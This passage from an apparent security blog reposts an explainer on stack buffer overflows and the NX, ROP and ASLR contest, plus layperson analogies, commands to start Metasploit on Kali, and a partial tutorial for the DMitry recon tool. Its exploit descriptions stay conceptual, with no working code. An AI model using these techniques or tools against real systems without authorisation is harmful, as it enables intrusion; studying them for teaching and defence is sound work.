that constraint because of the use of the awful <code>gets()</code> function. Send more than 512 bytes over the network and <code>fingerd</code> would overflow its buffer. So this is exactly what Robert Morris did: his exploit sent 537 bytes to <code>fingerd</code> (536 bytes of data plus a new-line character, which made <code>gets()</code>
stop reading input), overflowing the buffer and overwriting the return
address. The return address was set simply to the address of the buffer
on the stack.<br />
<aside class="manual-ad right"></aside>
The Morris worm's executable payload was simple. It started with 400
NOP instructions, just in case the stack layout was slightly different,
followed by a short piece of code. This code spawned the shell, <code>/bin/sh</code>. This is a common choice of attack payload; the <code>fingerd</code> program ran as root, so when it was attacked to run a shell, that shell also ran as root. <code>fingerd</code>
was plumbed into the network, taking its "keyboard input" from the
network and likewise sending its output back over the network. Both of
these features are inherited by the shell executed by the exploit,
meaning that the root shell was now usable remotely by the attacker.<br />
While <code>gets()</code> is easy to avoid—in fact, even at the time of the Morris worm, a fixed version of <code>fingerd</code> that didn't use <code>gets()</code>
was available—other parts of C are harder to ignore and no less prone
to screw ups. C's handling of text strings is a common cause of
problems. The behavior mentioned previously—stopping at null bytes—comes
from C's string behavior. In C, a string is a sequence of characters,
followed by a null byte to terminate the string. C has a range of
functions for manipulating these strings. Perhaps the best pair are <code>strcpy()</code>, which copies a string from a source to a destination, and <code>strcat()</code>,
which appends a source string to a destination. Neither of these
functions has a parameter for the size of the destination buffer. Both
will merrily read from their source forever until they reach a null
character, filling up the destination and overflowing it without a care
in the world.<br />
Even when C's string handling functions <em>do</em> take a parameter
for the buffer size, they can do so in a way that leads to errors and
overflows. C offers a pair of siblings to <code>strcat()</code> and <code>strcpy()</code> called <code>strncat()</code> and <code>strncpy()</code>. The extra <code>n</code> in their names denotes that they take a size parameter, of sorts. But <code>n</code> is
not, as many naive C programmers believe, the size of the buffer being
written to; it is the number of characters from the source to copy. If
the source runs out of characters (because a null byte is reached) then <code>strncpy()</code> and <code>strncat()</code>
will make up the difference by copying more null bytes to the
destination. At no point do the functions ever care about the actual
size of the destination.<br />
Unlike <code>gets(),</code> it is possible to use these functions
safely; it's just difficult. C++ and Objective-C both include superior
alternatives to C's functions, making string manipulation much simpler
and safer, but they retain the old C capabilities for reasons of
backwards compatibility.<br />
Moreover, they retain C's fundamental weakness: buffers do not know
their own size, and the language never validates the reads and writes
performed on buffers, allowing them to overflow. This same behavior also
led to the recent <a href="http://arstechnica.com/security/2014/04/critical-crypto-bug-in-openssl-opens-two-thirds-of-the-web-to-eavesdropping/">Heartbleed bug</a> in OpenSSL. That wasn't an overflow; it was an over<em>read</em>; the C code in OpenSSL tried to read more from a buffer than the buffer contained, leaking sensitive information to the world.<br />
</div>
</div>
<div class="superscroll-placeholder loaded" data-page="2">
<div class="superscroll-content show">
<h2>
Fixing the leaks</h2>
Needless to say, it is not beyond the wit of mankind to develop
languages in which reads from and writes to buffers are validated and
so can never overflow. Compiled languages such as the Mozilla-backed <a href="http://arstechnica.com/information-technology/2015/05/mozilla-backed-rust-language-stabilizes-at-version-1-0/">Rust</a>,
safe runtime environments such as Java and .NET, and virtually every
scripting language like Python, JavaScript, Lua, Python, and Perl are
immune to this problem (although .NET does allow developers to
explicitly turn off all the safeguards and open themselves up to this
kind of bug once more should they so choose).<br />
That the buffer overflow continues to be a feature of the security
landscape is a testament to C's enduring appeal. This is in no small
part due to the significant issue of legacy code. An awful lot of C code
still exists, including the kernel of every major operating system and
popular libraries such as OpenSSL. Even if developers want to use a safe
language such as C#, they may need to depend on a third-party library
written in C.<br />
Performance arguments are another reason for C's continued use,
though the wisdom of this approach was always a little unclear. It's
true that compiled C and C++ tend to produce fast executables, and in
some situations that matters a great deal. But many of us have
processors that spend the vast majority of their time idling; if we
could sacrifice, say, ten percent of the performance of our browsers in
order to get a cast iron guarantee that buffer overflows—in addition to
many other common flaws—were impossible, we might decide that would be a
fair trade-off, if only someone were willing to create such a browser.<br />
<aside class="manual-ad right"></aside>
Nonetheless, C and its friends are here to stay; as such, so are buffer overflows.<br />
Some effort is made to stop the overflow errors before they bite
anyone. During development there are tools that can analyze source code
and running programs to try to detect dangerous constructs or overflow
errors before those bugs ever make their way into shipping software. New
tools such as <a href="https://code.google.com/p/address-sanitizer/">AddressSantizer</a> and older ones such as <a href="http://valgrind.org/">Valgrind</a> both offer this kind of capability.<br />
However, these tools both require the active involvement of the
developer, meaning not all programs use them. Systemic protections that
strive to make buffer overflows less dangerous when they do occur can
protect a much greater variety of software. In recognition of this,
operating system and compiler developers have implemented a number of
systems to make exploiting these overflows harder.<br />
Some of these systems are intended to make specific attacker tasks
harder. One set of Linux patches made sure that system libraries were
all loaded at low addresses to ensure that they contained at least one
null byte in their address; this makes it harder to use their addresses
in any overflow that uses C string handling.<br />
Other defenses are more general. Many compilers today have some kind
of stack protection. A runtime-determined value known as a "canary" is
written onto the end of the stack near where the return address is
stored. At the end of every function, that value is checked for
modification before the return instruction is issued. If the canary
value has changed (because it has been overwritten in a buffer overflow)
then the program will immediately crash rather than continue.<br />
Perhaps the most important single protection is one variously known
as W^X ("write exclusive-or execute"), DEP ("data execution
prevention"), NX ("No Xecute"), XD ("eXecute Disable"), EVP ("Enhanced
Virus Protection," a rather peculiar term sometimes used by AMD), XN
("eXecute Never"), and probably more. The principle here is simple.
These systems strive to make memory either <em>writeable</em> (suitable for buffers) or <em>executable</em> (suitable for libraries and program code) but not <em>both</em>.
Thus, even if an attacker can overflow a buffer and control the return
address, the processor will ultimately refuse to execute the shellcode.<br />
Whichever name you use, this is an important technique not least
because it comes at essentially no cost. This approach leverages
protective measures built into the processor itself as part of the
hardware support for virtual memory.<br />
As described before, with virtual memory every process gets its own
set of private memory addresses. The operating system and processor
together maintain a mapping from virtual addresses to <em>something else</em>;
sometimes a virtual address corresponds to a physical memory address,
sometimes it corresponds to a portion of a file on disk, and sometimes
it corresponds to nothing at all because it has not been allocated. This
mapping is granular, typically using 4,096 byte chunks called <em>pages</em>.<br />
The data structures used to store the mapping don't just include the
location (physical memory, disk, nowhere) of each page; they also
contain (usually) three bits defining the page's protection: whether the
page is readable, whether it is writeable, and whether it is
executable. With this protection, areas of the process' memory that are
used for data, such as the stack, can be marked as readable and
writeable but not executable. Conversely, areas such as the program's
executable code and libraries can be marked as readable and executable
but not writeable.<br />
One of the great things about NX is that it can be applied to
existing programs retroactively just by updating the operating system to
one that supports it. Occasionally programs do run into problems.
Just-in-time compilers, used for things like Java and .NET, generate
executable code in memory at runtime, and as such need memory that is
both writeable and executable (though strictly, they don't need it to be
both things simultaneously). In the days before NX, any memory that was
readable was also executable, so these JIT compilers never had to do
anything special to their read-writeable buffers. With NX, they need to
make sure to change the memory protection from read-write to
read-execute.<br />
The need for something like NX was clear, especially for Microsoft.
In the early 2000s, a pair of worms showed that the company had some
serious code security problems: Code Red, which infected as many as
359,000 Windows 2000 systems running Microsoft's IIS Web server in July
2001, and SQL Slammer, which infected more than 75,000 systems running
Microsoft's SQL Server database in January 2003. These were high-profile
embarrassments.<br />
Both of them exploited stack buffer overflows, and strikingly, though
they came 13 and 15 years after the Morris worm, the method of
exploitation was virtually identical. An exploit payload was placed into
the buffer on the stack and the return address overwritten to execute
it. (The only slight nuance was that both of these used the trampoline
technique. Instead of setting the return address directly to the address
of the stack, they set the return address to an instruction that in
turn passes execution to the stack.)<br />
Naturally, these worms were also advanced in other ways. Code Red's
payload didn't just self-replicate; it also defaced webpages and
attempted to perform denial of service attacks. SQL Slammer packed
everything it needed to find new machines to exploit and spread through a
network in just a few hundred bytes, and it left no footprint on
machines it infected; reboot and it was gone. Both worms also worked on
an Internet that was enormously larger than the one the Morris worm
worked with, and hence they infected many more machines.<br />
But the central issue, that of a straightforwardly exploitable stack
buffer overflow, was an old one. These worms were both major news and
made many people question the use of Windows in any kind of an
Internet-facing, server capacity. Microsoft's response was to start
taking security seriously. Windows XP Service Pack 2 was the first real
product with this mindset. It utilized a number of software changes,
including a software firewall, changes to Internet Explorer to prevent
silent installation of toolbars, plugins—and NX support.<br />
Hardware supporting NX has been mainstream since 2004, when Intel
introduced the Prescott Pentium 4, and operating system support for NX
has been widespread since Windows XP Service Pack 2. Windows 8 forced
the issue even more by cutting off support for older processors that
didn't have NX hardware.<br />
<h2>
Beyond NX</h2>
In spite of the spread of NX support, buffer overflows remain a
security issue to this day. That's because a number of techniques were
devised to bypass NX.<br />
The first of these was similar to the trampolining trick already
described to pass control to the shellcode in a stack buffer via an
instruction found in another library or executable. Instead of looking
for a fragment of executable code that will pass execution directly back
to the stack, the attacker looks for a fragment that does something
useful in its own right.<br />
Perhaps the best candidate for this is the Unix <code>system() </code>function. <code>system()</code>
takes one parameter: the address of a string representing a command
line to be executed, and traditionally that parameter is passed on the
stack. The attacker can create a command-line string and put it in the
buffer to be overflowed, and because (traditionally) things didn't move
around in memory, the address of that string would be known and could be
put on the stack as part of the attack. The overwritten return address
in this situation isn't set to the address of the buffer; it's set to
the address of the <code>system()</code> function. When the function with the buffer overflow finishes, instead of returning to its caller, it runs the <code>system()</code> function to execute a command of the attacker's choosing.<br />
This neatly bypasses NX. The <code>system()</code> function, being
part of a system library, is already executable. The exploit doesn't
have to execute code from the stack; it just has to <em>read</em> the
command line from the stack. This technique is called "return-to-libc"
and was invented in 1997 by Russian computer security expert <a href="http://insecure.org/sploits/linux.libc.return.lpr.sploit.html">Solar Designer</a>. (libc is the name of the Unix library that implements many key functions, including <code>system()</code>, and is typically found loaded into every single Unix process, so it makes a good target for this kind of thing.)<br />
While useful, this technique can be somewhat limited. Often functions
don't take their arguments from the stack; they expect them to be
passed in registers. Passing in command-line strings to execute is nice,
but it often involves those annoying nulls, which can foul everything
up. Moreover, it makes chaining multiple function calls very difficult.
It can be done—provide multiple return addresses instead of one—but
there's no provision for changing the order of arguments, using return
values, or anything else.<br />
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1837" data-width="2143" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-rop.png"><img height="257" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-rop-300x257.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
<a class="enlarge" data-height="1837" data-width="2143" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-rop.png">Enlarge</a> <span class="sep">/</span>
Instead of filling the buffer with shellcode, we fill it with a
sequence of return addresses and data. These return addresses pass
control to existing fragments of executable code within the victim
program and its libraries. Each fragment of code performs an operation
and then returns, passing control to the next return address.</div>
</figcaption></figure>
Over the years, return-to-libc was generalized to alleviate these restrictions. In late 2001, a <a href="http://phrack.org/issues/58/4.html">number of ways</a>
to extend return-to-libc to make multiple function calls was
documented, along with solutions for the null byte problem. These
techniques were nonetheless limited. A more complicated technique
formally described <a href="http://cseweb.ucsd.edu/%7Ehovav/dist/geometry.pdf">in 2007</a> for the most part lifted all these restrictions: return-oriented-programming (ROP).<br />
This used the same principle as from return-to-libc and trampolining
but generalized further still. Where trampolining uses a single fragment
of code to pass execution to shellcode in a buffer, ROP uses <em>lots</em>
of fragments of code, called "gadgets" in the original ROP paper. Each
gadget follows a particular pattern: it performs some operation (putting
a value in a register, writing to memory, adding two registers, etc.)
followed by a return instruction. The same property that makes x86 good
for trampolining works here too; the system libraries loaded into a
process contain <em>many hundreds</em> of sequences that can be interpreted as "perform an action, then return" and hence can be used in ROP-based attacks.<br />
The gadgets are all chained together by a long sequence of return
addresses (and any useful or necessary data) written to the stack as
part of the buffer overflow. The return instructions leap from gadget to
gadget with the processor rarely or never <em>calling</em> functions, only ever <em>returning</em>
from them. Remarkably, it was discovered that, at least on x86, the
number and variety of useful gadgets is such that an attacker can
generally do <em>anything</em>; this weird subset of x86, used in a
peculiar way, is often Turing complete (though the exact range of
capabilities will depend on which libraries a given program has loaded
and hence which gadgets are available).<br />
As with return-to-libc, all the actual <em>executable code</em> is
taken from system libraries, and so NX protection is useless. The
greater flexibility of the approach means that exploits can do the
things that are difficult even with chained return-to-libc, such as
calling functions that take arguments in registers, using return values
from one function as an argument for another, and much more besides.<br />
The ROP payloads vary. Sometimes they're simple "create a
shell"-style code. Another common option is to use ROP to call a system
function to change the NX state of a page of memory, flipping it from
being writable to being executable. Doing this, an attacker can use a
conventional, non-ROP payload, using ROP only to make the non-ROP
payload executable.<br />
</div>
</div>
<h2>
Getting random</h2>
This weakness of NX has long been recognized, and a recurring theme
runs throughout all these exploits: the attacker knows the memory
addresses of the stack and system libraries ahead of time. Everything is
contingent on this knowledge, so an obvious thing to try is removing
that knowledge. This is what Address Space Layout Randomization (ASLR)
does: it randomizes the position of the stack and the in-memory location
of libraries and executables. Typically these will change either every
time a program is run, every time a system is booted, or some
combination of the two.<br />
This greatly increases the difficulty of exploitation, because all of
a sudden, the attacker doesn't know where the ROP instruction fragments
will be in memory, or even where the overflowed stack buffer will be.<br />
ASLR in many ways goes hand in hand with NX, because it shores up the
big return-to-libc and return-oriented-programming gaps that NX leaves.
Unfortunately, it's a bit more intrusive than NX. Except for JIT
compilers and a few other unusual things, NX could be safely added to
existing programs. ASLR is more problematic; programs and libraries need
to ensure that they do not make any assumptions about the address
they're loaded at.<br />
On Windows, for example, this shouldn't be a huge issue for DLLs.
DLLs on Windows have always supported being loaded at different
addresses, but it could be an issue for EXEs. Before ASLR, EXEs would
always be loaded at an address of <code>0x0040000</code> and could
safely make assumptions on that basis. After ASLR, that's no longer the
case. To make sure that there won't be any problems, Windows by default
requires executables to indicate that they specifically support ASLR and
opt in to enabling it. The security conscious can, however, force
Windows to enable it for all executables and libraries even if programs
don't indicate that they support it. This is almost always fine.<br />
The situation is <a href="http://www.cert.org/blogs/certcc/post.cfm?EntryID=191">perhaps worse</a>
on x86 Linux, as the approach used for ASLR on that platform exacts a
performance cost that may be as high as 26 percent. Moreover, this
approach absolutely <em>requires</em> executables and libraries to be
compiled with ASLR support. There's no way for an administrator to
mandate the use of ASLR as there is in Windows. (x64 does not quite
eliminate the performance cost of the Linux approach, but it does
greatly alleviate it.)<br />
When ASLR is enabled, it provides a great deal of protection against
easy exploitation. ASLR still isn't perfect, however. For example, one
restriction is the amount of randomness it can provide. This is
especially acute on 32-bit systems. Although the memory space has more
than 4 billion different addresses, not all of those addresses are
available for loading libraries or placing the stack.<br />
Instead, it's subject to various constraints. Some of these are broad
goals. Generally, the operating system likes to keep libraries loaded
fairly close together at one end of the process' address space, so that
as much contiguous empty space is available to the application as
possible. You wouldn't want to have one library loaded every 256MB
throughout the memory space, because the biggest single allocation you'd
be able to make would be a little less than 256MB, which limits the
ability of applications to work on big datasets.<br />
Executables and libraries generally have to be loaded so that they
start on, at the very least, a page boundary. Normally, this means they
must be loaded at an address that's a multiple of 4,096. Platforms can
have similar conventions for the stack; Linux, for example, starts the
stack on a multiple of 16 bytes. Systems under memory stress sometimes
have to further reduce the randomness in order to fit everything in.<br />
The impact of this varies, but it means that attackers can sometimes
guess what an address will be and have a reasonable probability of
guessing right. Even a fairly low chance—one in 256, say—can be enough
in some situations. When attacking a Web server that will automatically
restart crashed processes, it may not matter that 255 out of 256 attacks
crash the server. It will simply be restarted, and the attacker can try
again.<br />
But on 64-bit systems, there's so much address space that this kind
of guessing approach is untenable. The attacker could be stuck with a
one in a million or one in a billion chance of getting it right, and
that's a small enough chance as to not matter.<br />
Guessing and crashing isn't much good for attacks on, say, browsers;
no user is going to restart a browser 256 times in a row just so that an
attacker can strike it lucky. As a result, exploiting this kind of flaw
on a system with both NX and ASLR can't be done without help.<br />
<aside class="manual-ad right"></aside>
This help can come in many forms. One route in browsers is to use
JavaScript or Flash—both of which contain JIT compilers that generate
executable code—to fill large portions of memory with carefully
constructed executable code. This produces a kind of large-scale NOP
sled in a technique known as "heap spraying." Another approach is to
find a secondary bug that inadvertently reveals memory addresses of
libraries or of the stack, giving the attacker enough information to
construct a custom set of ROP return addresses.<br />
A third approach was again common in browsers: take advantage of
libraries that don't use ASLR. Old versions of, for example, Adobe's PDF
plugin or Microsoft's Office browser plugins didn't enable ASLR, and
Windows by default doesn't force ASLR on non-ASLR code. If attackers
could force such a library to load (by, for example, loading a PDF into a
hidden browser frame) then they no longer needed to be too concerned
about ASLR; they could just use that non-ASLR library for their ROP
payload.<br />
<h2>
A never-ending war</h2>
The world of exploitation and mitigation techniques is one of cat and
mouse. Powerful protective systems such as ASLR and NX raise the bar
for taking advantage of flaws and together have put the days of the
simple stack buffer overflow behind us, but smart attackers can still
combine multiple flaws to defeat these protections.<br />
The escalation continues. Microsoft's <a href="https://support.microsoft.com/en-us/kb/2458544">EMET</a>
("Enhanced Mitigation Experience Toolkit") includes a range of
semi-experimental protections that try to detect heap spraying or
attempts to call certain critical functions in ROP-based exploits. But
in the continuing digital arms war, even these have security techniques
that have been defeated. This doesn't make them useless—the difficulty
(and hence cost) of exploiting flaws goes up with each new mitigation
technique—but it's a reminder of the need for constant vigilance</div>
</section></div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com4tag:blogger.com,1999:blog-4509349481580895365.post-36232532745462004612015-08-27T10:34:00.000+05:302015-08-27T10:34:08.897+05:30What is Buffer Overflow ?<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
If you have been buzzing around what is buffer overflow here is the explanation for your hungry minds<br />
<br />
What is buffer overflow ?<br />
<br />
<span class="_Tgc">Heap <b>Overflow Attacks</b>. Programs use
dynamically allocated memory as well as the stack. A vulnerable program
uses a call to something like strcpy to copy input into a <b>buffer</b>, allocated on the heap.</span><br />
<br />
<br />
Source : <a href="http://security.stackexchange.com/questions/53878/how-to-explain-buffer-overflow-to-a-layman" rel="nofollow" target="_blank">Security Stackexchange</a><br />
<br />
it sounds too technical ,i m a beginner how can i understand it?<br />
<br />
<div class="post-text" itemprop="text">
Imagine you have a list of people you owe money to.<br />
<img alt="Name | Amount owing" src="http://i.stack.imgur.com/uZ68n.png" /><br />
Also, you have a weird pen with built-in correction fluid, so that if
you write something in a particular place, and then write something
else, it erases the first thing you wrote. This is how computer memory
works, which is a bit different from how writing normally works.<br />
You pay someone a $500 deposit on a $5000 car, so you now owe them
$4500. They tell you their name is John Smith. You write the amount
(4500) and the name (John Smith) in the table. Your table now looks like
this:<br />
<img alt="John Smith | 4500" src="http://i.stack.imgur.com/yXv9A.png" /><br />
Later your table reminds you to pay them back. You pay the $4500
(plus interest) and erase it from the table, so now your table is blank
again.<br />
Then you get a $1000 loan from someone else. They tell you their name
is "John Smithxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx9999999999".
You write the amount (1000) and the name (John
Smithxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx9999999999) in your table. Your
table now looks like this:<br />
<img alt="John Smithxxxxxxxxxxxxxxxxxxxxxxx|x99999999990" src="http://i.stack.imgur.com/3qpC5.png" /><br />
(the last 0 from 1000 was not written over. This is unimportant.)<br />
When writing the name, you didn't stop when you got to the end of the
"name" column, and kept writing into the "amount owing" column! This is
a buffer overflow.<br />
Later, your table reminds you that you owe $99999999990 to John
Smithxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx. You find him again and pay him
almost 100 billion dollars.<br />
<br />
<br />
This is pretty simple to explain if you understand it well enough.
Just make sure you hit on the important background. More or less in this
order:<br />
<ul>
<li>The "stack" is a place where you can store temporary information.
The "stack pointer" determines where the end of the stack is. When a
function runs, it moves the stack pointer to give itself memory to work
with, and when it's done, it moves the pointer back where it found it.</li>
<li>The stack grows backwards. So to give yourself 100 bytes on the stack, you <em>subtract</em>
100 from the stack pointer rather than adding it. If the previous
function's stack started at 1000 and I want 100 bytes, then my stack
starts at 900.</li>
<li>This means that if you use more space than you gave yourself, you
won't just continue writing out into empty space, you'll actually start
<em>overwriting</em> previous stack values.</li>
<li>When my function starts, the very top value left on the stack for me by the previous function is the <em>return address</em> where I should go when my function is done.</li>
<li>This means that if my function overruns its stack, the <em>very first thing</em>
that it's going to overwrite is the return address. If the attacker is
careful about what he fills the stack with, he can specify whatever
return address he wants.</li>
<li>When my function exists, whatever code is at that return address is what will get executed next.</li>
</ul>
<h1>
Simple Example</h1>
In <a href="http://insecure.org/stf/smashstack.html">Smashing the Stack for Fun and Profit</a>,
where this technique was originally described, the most simple and
straight-forward technique was introduced. Imagine the function reads
your name and then returns. So your stack looks like this:<br />
<pre><code>Stack Pointer Prev. Stack Ptr
+----------------------------------+--------------+................
| Your Name Here | Return Addr | Old stack ...
+----------------------------------+--------------+................
</code></pre>
But the bad guy makes his name long enough to overflow the space. And
not only that, instead of typing a real name, he types in some Evil
Code, some padding, and the address of that Evil Code.<br />
<pre><code>+----------------------------------+--------------+................
| [ Evil Code ]xxxxxxxxxxxxxxxxxxxxxxEvil Address | Old stack ...
+----------------------------------+--------------+................
▲──────────────────────────────────┘
</code></pre>
Now instead of returning back to the previous caller, you jump straight to the <code>[Evil Code]</code>. Now you're running his code instead of your program. From there it's pretty much game-over.<br />
<h1>
Mitigation and Other Techniques</h1>
Two of the techniques used to reduce the effectiveness of stack smashing are DEP and ASLR. <br />
DEP ("Data Execution Prevention") works by marking the stack non-executable. This means that the <code>[Evil Code]</code>
on the stack won't run, because running code on the stack is no longer
allowed. To get around this, the attacker finds chunks of existing code
that will do bits and pieces of what he wants. And instead of just
overwriting his own return address, he creates a chain of return
addresses down through the stack for all the functions he wants to run
in turn. They call this "Return Oriented Programming", or ROP. The chain
of returns is called a "ROP Chain". This is really hard to do. But
there are tools to help.<br />
ASLR ("Address Space Layout Randomization") works by randomizing the
locations of all the interesting functions. Now creating a ROP chain
isn't so easy -- every time the program runs, all the addresses are in
different places. So when the attacker goes to overwrite the return
address with is own Evil Address, he won't know what numbers to use
because the code is always in different places.<br />
Neither DEP nor ASLR on its own offers much protection, but both together make successful exploitation <em>very</em> difficult. While some circumventions sometimes exist, there isn't a workaround that works <em>everywhere</em>. If you can get around DEP+ASLR, it's a one-off sort of success</div>
<div class="post-text" itemprop="text">
<br />
<br />
<br />
Here's an analogy that isn't the most technically accurate, but it should get the idea across.
<br />
Picture a recipe book on 3-hole punch paper in a binder (memory) and a very dumb cook (the processor, i.e. the CPU).<br />
<ul>
<li>People can add or remove pages from the binder (load or unload programs and data in memory)</li>
<li>The cook just follows every instruction on the page they're on</li>
<li>The cook starts at the beginning (bootloader) and continues on until the instruction is "close book"
<ul>
<li>Even if the instruction is to flip to another page (Turn to page 394)</li>
</ul>
</li>
</ul>
So, normally, you'd write on page one "Turn to page 200 (waffles)",
open up the binder, and put in waffles at page 200. Then have the cook
start - the cook should make waffles!<br />
But wait... there's an attacker! They've written notes in the
margins of your waffle recipe (outside the buffer) - and the cook
executes those instructions even though they're obviously handwritten.<br />
The cook was never told to only do what's printed on the original
sheet (in the normal buffer space) - the cook will also do anything
after that (in memory after the buffer).<br />
Perhaps the cook adds vinegar to the waffles (corrupts your files).
Perhaps the cook turns to page three hundred and ninety four and just
leaves the raw egg sitting there, unused, until it rots and molds (turns
off your antivirus). Perhaps the cook throws away everything in the
kitchen (deletes all your files), or puts a lock on your kitchen door to
keep you out (ransomware), or opens the window (installs a
trojan/backdoor) so the attacker can climb in the window.<br />
<br />
<br />
<br />
Hope it clarifies how the buffer overflow works and hope you understood about it.. <br />
<br />
</div>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-11226844861154015762015-08-27T10:23:00.000+05:302015-08-27T10:23:09.327+05:30Starting Metasploit in kali linux 2.0<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
If you buzzed around how to start metasploit at kali linux 2.0 here were the steps :<br />
<br />
<blockquote class="tr_bq">
<span class="co0"># Start the Postgresql Database</span><br />
<span class="sy0">/</span>etc<span class="sy0">/</span>init.d<span class="sy0">/</span>postgresql start<br />
<br />
<span class="co0"># Initialize the Metasploit Framework Database</span><br />
msfdb init<br />
<br />
<span class="co0"># Run msfconsole</span><br />
msfconsole</blockquote>
<br />
Hope it helps. </div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com6tag:blogger.com,1999:blog-4509349481580895365.post-8657700044529198922015-08-27T10:09:00.001+05:302015-08-27T10:09:39.053+05:30Dmitry kali Linux Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
I hereby share the tutorial for Dmitry of kali linux<br />
<br />
<div dir="ltr" style="text-align: left;">
<div class="MsoNoSpacing">
<b>Intro</b> - DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux Command Line Application coded in C language.</div>
<div class="MsoNoSpacing">
DMitry
has the ability to gather as much information as possible about a host.
Base functionality is able to gather possible subdomains, email
addresses, uptime information, tcp port scan, whois lookups, and more.
The information are gathered with following methods:</div>
<div class="MsoNoSpacing" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span>Perform an Internet Number whois lookup.</div>
<div class="MsoNoSpacing" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span>Retrieve possible uptime data, system and server data.</div>
<div class="MsoNoSpacing" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span>Perform a SubDomain search on a target host.</div>
<div class="MsoNoSpacing" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span>Perform an E-Mail address search on a target host.</div>
<div class="MsoNoSpacing" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span>Perform a TCP Portscan on the host target.</div>
<div class="MsoNoSpacing" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span>A Modular program allowing user specified modules</div>
<div class="MsoNoSpacing">
<br /></div>
<div class="MsoNoSpacing">
1. How to open dmitry</div>
<div class="MsoNoSpacing">
A. GUI Method</div>
<div class="MsoNoSpacing">
</div>
<div class="MsoNoSpacing">
Application → Kali Linux→ Information gathering→ Live Host Identification→ dmitry</div>
<div class="MsoNoSpacing">
<i style="text-align: center;"><b><span style="font-size: xx-small;"> (click on image for large view)</span></b></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-g7ClTW70LJc/UePNDskP2BI/AAAAAAAAA-g/aD_vemc_Z1k/s1600/1.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="http://4.bp.blogspot.com/-g7ClTW70LJc/UePNDskP2BI/AAAAAAAAA-g/aD_vemc_Z1k/s400/1.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
B. Open Terminal type dmitry and hit enter</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-KV6o502VU1M/UePNH7Hxg3I/AAAAAAAAA-0/YIPTWHyvKx8/s1600/1B.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://2.bp.blogspot.com/-KV6o502VU1M/UePNH7Hxg3I/AAAAAAAAA-0/YIPTWHyvKx8/s400/1B.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
2. <b>-i</b>
– Thiscommand is used to perform a whois lookup of the IP address of a
host, this tells us that if we only no the name that dmitry will find
the IP for us.</div>
<div class="MsoNoSpacing">
Syntax – dmitry –i IP address</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – dmitry –i 192.168.71.128</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-_rxq2KBXHec/UePNIZUAN0I/AAAAAAAAA-8/Zhn2XkKo1Yk/s1600/2A.JPG"><img border="0" height="271" src="http://3.bp.blogspot.com/-_rxq2KBXHec/UePNIZUAN0I/AAAAAAAAA-8/Zhn2XkKo1Yk/s320/2A.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
3. <b>–w</b> – This command is used to perform a whois lookup on the domain name of a host. </div>
<div class="MsoNoSpacing">
Syntax – dmitry –w domain</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – dmitry –w facebook.com</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-O5T7tbIHrAg/UePNMh6CSgI/AAAAAAAAA_M/hJX_Hq06MlE/s1600/3.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="http://1.bp.blogspot.com/-O5T7tbIHrAg/UePNMh6CSgI/AAAAAAAAA_M/hJX_Hq06MlE/s400/3.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
4. <b>–s</b> – This command is used to performs a search for possible subdomains.</div>
<div class="MsoNoSpacing">
Syntax – dmitry –s domain</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
